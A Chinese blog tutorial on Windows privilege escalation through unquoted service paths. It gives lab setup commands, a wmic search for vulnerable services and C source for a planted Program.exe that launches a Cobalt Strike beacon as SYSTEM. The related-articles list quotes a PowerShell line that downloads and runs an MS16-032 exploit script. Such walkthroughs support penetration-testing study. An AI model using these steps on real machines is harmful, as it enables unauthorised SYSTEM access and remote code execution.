windows提权-Tusted service path

最新推荐文章于 2024-10-11 15:50:14 发布
最新推荐文章于 2024-10-11 15:50:14 发布
阅读量829 收藏 15
点赞数 21
文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/z1900552728/article/details/138182990
版权

Tusted service path提权

windows服务通常都是以System权限运行的,所以系统在解析服务的二进制文件对应的文件路径中的

空格的时候也会以系统权限进行解析。如果我们能利用这一特性,就有机会进行权限提升。

如果在注册表中存在没有被引用起来的服务路径 如果是 C:\Program Files\Some Folder\Service.exe 因为 Program Files Some Folder 都存在空格,就可能存在截断,依次寻找

如下的程序并且执行阶段如下:

C:\Program.exe

C:\Program Files\Some.exe

C:\Program Files\Some Folder\Service.exe

提权的条件如下:

  1. 路径没有被引号引起来
  2. 服务的路径存在空格
  3. 服务以最高权限启动
  4. 当前被控权限有对应目录下写文件的能力

配置一个tusted service path 提权环境

  1. 首先创建一个服务,路径中存在空格,且路径没有引号

sc create "service" binpath= "C:\Program Files\Common Files\service\service.exe"

start= auto 

并在对应目录创建service.exe服务

查询该服务(也可使用服务查询)

sc qc service

现在条件基本足够,还缺普通用户向文件下的写权限

权限查询,可以看到只有administrator和system有f 完全控制权

icacls "C:"

icacls "C:\Program Files"

icacls "C:\Program Files\Common Files"

此时提权,向program file目录写program.exe,

查询program file的权限,得到user组中只有读以及执行权限,没有写权限

icacls "C:\Program Files"

接下来给普通用户赋予写权限

r读 x执行 w写 f完全执行  m修改

icacls "C:" /grant "BUILTIN\Users":W

切换到web用户,假设cs已经上线

当前为web用户,且没有高权限

查找没有引号和带有空格的服务

wmic service get name,displayname,pathname,startmode | findstr /i "Auto" |

findstr /i /v "C:\\Windows\\" | findstr /i /v """

查找到service服务

查看是否有写权限

icacls "C:"

icacls "C:\Program Files"

icacls "C:\Program Files\Common Files"

可以看到web有f权限

制作一个Program.exe的恶意软件,将其放到c盘目录下进行提权(原理为前文的解析顺序)

Program.exe的源码

#include<stdio.h>

#include<stdlib.h>

int main(){

system("cmd.exe /c C:\\USERS\\web\\Desktop\\cs.exe");

return 0;

}

#执行命令,让program.exe运行,执行cs.exe,从而以system权限上线(目标机器重启后)

山炮Sec
关注
操作系统权限提升(四)之系统错误配置-Tusted Service Paths提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-01 983
随着网络安全的发展和普及,不打补丁的系统少之又少,所以很多时候通过系统自身的漏洞很难提权,这个时候就需要考虑查看是否存在可利用的错误系统配置,例如路径未加引号或未指定可执行文件路径等,总而言之就是因为管理员在配置一些软件的时候存在漏洞导致可以提权的。
无法启动此程序,因为计算机丢失api-ms-win-core-path-l1-1-0.dll的解决方案
weixin_43178406的博客
07-20 6万+
本文主要介绍了无法启动此程序,因为计算机丢失api-ms-win-core-path-l1-1-0.dll的解决方案,希望能对使用Python的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案 文章目录 1. 问题描述 2. 解决方案
带空格的系统服务提权
weixin_46686336的博客
11-11 125
Windows提权
提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权
fendo
03-29 1万+
(一)、Mssql提权 必要条件:获取到mssql数据库最高权限用户sa的账号密码 Mssql默认端口:1433 Mssql最高权限用户:sa 得到sa密码之后,通过工具直接连接上去。 MSSQL自带了一个XP_CMDSHELL用来执行CMD命令。 (二)、GetPass 提权 一款获取计算机
实战渗透-一次拿到webshell后艰难的提权
qq_29437513的博客
07-25 2140
记上一篇,拿到webhshell后,数据库是dba, 本地上传一个cmd.exe组件上去后,执行失败 网上很多说改路径,写的也写不明白,想到之前迪哥用过的大马提权, 环境是php,但支持asp,有iis组件, 发现 D://recycle可写,传一个cmd.com组件执行命令 权限真的很小,是 nt service 网络用户权限,ns的权限是不能执行net的 支持的组件,提权的时候用的找 ===================== 查看systeminfo,发现有200多个补丁,准备打溢出,目标机是可以
windows提权总结
qq_44657899的博客
01-15 4356
文章目录0x01 使用ms16-032提权 0x01 使用ms16-032提权 exp地址: https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1 powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.8.12/Invoke-MS16-03
5.7.1、部署时报NT Service无处理权限的解决方法
soldierluo的专栏
02-08 2440
JOB调用SSAS命令生成cube时报NT Service\SQL agent$sqlserver2012无处理权限错误的解决方法   打开sql server配置管理器-》选择sql server服务-》将SQLServer、SSIS、SSAS、SSRS、SQLServer代理的登录身份改为“内置账户”,并选择local system,即可
Windows提权!!!
huohaowen的博客
03-31 1199
怒肝一万多字
提权学习:Windows提权系列————上篇
bylfsj的博客
10-15 585
前言在渗透测试中,提升自己的权限是经常遇到的问题,往往在渗透中最容易获取的权限就是一个webshell,如果网站是架设在Windows系统上的,这时就可能遇到这样的问题,还有一种情况是在做横向渗透的时候,收集到一些可以远程连接桌面的帐号,这是也需要,在实际的渗透中有很多的地方会需要这个操作,这个系列就主要介绍...
Windows提权--小迪权限提升--烂土豆--DLL劫持--udf提权
z2560088的博客
02-13 4379
针对环境 windows有两种环境,一种是web网站拿到的webshell环境,一般是低权限的用户,(jsp除外,拿到webshell就是system权限)另一种是本地的环境,可能是服务器为管理某项服务创建的低权限用户。不同环境下的操作会有所不同。 提权方法 1.win溢出漏洞(如何判断类型和利用) 信息收集-补丁筛选-利用 MSF 或特定 EXP-执行-西瓜到手 Vulmap,Wes,WindowsVulnScan 对比,exp 在哪里获取? 利用wes进行补丁筛选 2.数据库提权 ...
安装miniconda出现丢失api-mis-win-core-path-l1-1-0.dll的解决方案
weixin_43178406的博客
03-08 1万+
本文主要介绍了安装miniconda时出现丢失api-mis-win-core-path-l1-1-0.dll的解决方案,希望能对新手有所帮助。 文章目录 1. 问题描述 2. 解决方案
windows使用ssh-copy-id命令的解决方案
热门推荐
weixin_43178406的博客
04-22 6万+
本文主要介绍了windows使用ssh-copy-id命令的解决方案,希望能对使用windows的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案 2.1 方案一 2.2 方案二
提权系列(一)----Windows Service 服务器提权初识与exp提权,mysql提权
fendo
03-29 2万+
一、 二、Windwos常见提权
生信初学者教程(二十八):单细胞数据标准化
专注生信领域
10-11 142
生信初学者教程(二十八):单细胞数据标准化
Sql语句解析工具类
code_nn的博客
10-11 351
Sql语句解析工具类,利用第三方依赖,根据sql解析获取表名称
Rust>iced库(0.13.1)学习之部件(三十一):picklist部件的使用及可变style设置
用沸腾的热血,支付我们的人生吧!
10-08 345
where'a,T,L,V,Message,> wherepicklist,即下拉列表,是预设选项的可选择列表。
Java Stream API flatMap()方法介绍
骑着猪看大海的博客
10-08 784
flatMap 的主要作用是将一个流中的每个元素转换为另一个流,然后将这些流合并成一个单一的流。经常用作处理嵌套的流。
有点晕,inline, crossinline,noinline小计
github_35581409的博客
10-08 366
我们启动了一个协程,但是在normalForeach的lambda中无法使用delay,因为这里其实是一个函数对象,会指向到另外一个函数方法,没有协程的上下文环境,但是内敛函数就不一样了,他相当于是把lambda中的内容拷贝平铺过来了,所以,在inlinedForeach中可以使用协程的上下文环境,delay可以执行。另外,当把一个函数声明为inline的时候,他的lambda参数也是inline的,所以无法通过函数地址引用的方式来调用。内敛函数,因为相当于被拷贝过来了,可以直接返回到main,
numexpr-2.8.3-cp38-cp38-win_amd64.whl
最新发布
10-14
numexpr-2.8.3-cp38-cp38-win_amd64.whl
pm2-windows-service如何使用
03-09
3. 接下来,您可以使用以下命令将您的 Node.js 应用程序转换为 Windows 服务:pm2-service-install -n <service-name> -p <path-to-node-app> 4. 您可以使用以下命令启动服务:net start <service-name> 5. 您可以...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值